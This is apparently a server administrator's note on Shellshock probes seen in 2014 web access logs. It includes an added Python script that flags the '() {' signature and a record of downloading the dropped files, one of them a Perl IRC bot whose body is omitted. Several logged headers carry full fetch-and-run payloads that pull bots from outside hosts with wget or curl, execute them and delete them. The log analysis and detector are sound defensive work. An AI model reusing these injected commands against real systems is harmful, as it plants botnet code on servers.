Scan history

internetsurvey-3.erratasec.com - - [25/Sep/2014:04:33:35 +0900] "GET / HTTP/1.0" 200 156 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
internetsurvey-3.erratasec.com - - [25/Sep/2014:11:19:59 +0900] "GET / HTTP/1.0" 200 156 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
hosted-by.snel.com - - [25/Sep/2014:14:59:52 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 994 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
118.192.48.6 - - [28/Sep/2014:00:48:23 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo **********`;"
118.192.48.6 - - [28/Sep/2014:00:48:23 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo **********`;"
118.192.48.6 - - [28/Sep/2014:00:48:24 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo ************"
118.192.48.6 - - [28/Sep/2014:00:48:24 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo **********`;"
rottweiler.net7.be - - [28/Sep/2014:14:15:03 +0900] "GET / HTTP/1.0" 200 145 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
60.18.147.183 - - [28/Sep/2014:17:34:22 +0900] "GET / HTTP/1.0" 200 125 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
12.64.2d.static.xlhost.com - - [29/Sep/2014:01:53:09 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 1003 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [29/Sep/2014:22:28:19 +0900] "GET / HTTP/1.1" 200 177 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
web21.qna.vengit.com - - [30/Sep/2014:10:43:15 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 1003 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
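As an added defensive example (not part of the original note), here is a small Python script that parses combined-format access log lines like the ones above and flags entries whose Referer or User-Agent carries the bash function definition `() {` that Shellshock scanners send. The sample lines are constructed for the example, use documentation-range addresses, and only echo a marker.

```python
import re

# Apache/nginx "combined" format, as in the entries above:
# host ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may hold backslash-escaped quotes (\"), as in the bash -c payloads.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# The Shellshock trigger is a bash function definition, "() {", at the start of
# an environment variable value. Scanners vary the spacing ("() { :; }" vs
# "() { :;}"), so allow any whitespace between the parentheses and the brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines (not from the original note): documentation-range
# addresses, and payloads that only echo a marker.
SAMPLE_LINES = [
    '203.0.113.10 - - [25/Sep/2014:04:33:35 +0900] "GET / HTTP/1.0" 200 156 '
    '"() { :; }; echo probe" "scanner/1.0"',
    '198.51.100.7 - - [28/Sep/2014:00:48:23 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1128 '
    '"http://example.com" "() { :;}; /bin/bash -c \\"echo testing\\""',
    '192.0.2.5 - - [28/Sep/2014:01:00:00 +0900] "GET /index.html HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0"',
]

def parse_line(line):
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def shellshock_fields(entry):
    """Names of the logged header fields carrying the '() {' signature."""
    return [f for f in ("referer", "agent") if SHELLSHOCK_RE.search(entry[f])]

def scan(lines):
    """(host, time, request, fields) for every line carrying a Shellshock probe.
    Only Referer and User-Agent reach this log format, so a payload sent in any
    other header (Cookie, X-*) would not be visible here."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is not None:
            fields = shellshock_fields(entry)
            if fields:
                hits.append((entry["host"], entry["time"], entry["request"], fields))
    return hits
```

Because only two request headers are logged, a clean access log does not prove no probe arrived; the host-side check is still whether bash on the CGI hosts has been patched.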

Checking the files the scanners tried to plant

[root@localhost tmp]# wget -O regular.bot "http://stablehost.us/bots/regular.bot"
--12:44:08--  http://stablehost.us/bots/regular.bot
           => `regular.bot'
stablehost.us をDNSに問いあわせています... 失敗しました: ホストが見つかりません.
[root@localhost tmp]# wget -O ji "http://213.5.67.223/ji"
--12:44:47--  http://213.5.67.223/ji
           => `ji'
213.5.67.223:80 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 16,680 [text/plain]

100%[=============================================================>] 16,680        59.47K/s             

12:44:48 (59.41 KB/s) - `ji' を保存しました [16680/16680]

[root@localhost tmp]# wget -O jurat "http://213.5.67.223/jurat"
--12:45:01--  http://213.5.67.223/jurat
           => `jurat'
213.5.67.223:80 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 404 Not Found
12:45:02 エラー 404: Not Found。
[root@localhost tmp]# dig -x 213.5.67.223 +short
hosted-by.as51430.net.

ji

#!/usr/bin/perl
# ------------------------------------------------------------- #
#                       LinuxNet perlbot                        #
# ------------------------------------------------------------- #

(remainder omitted)

References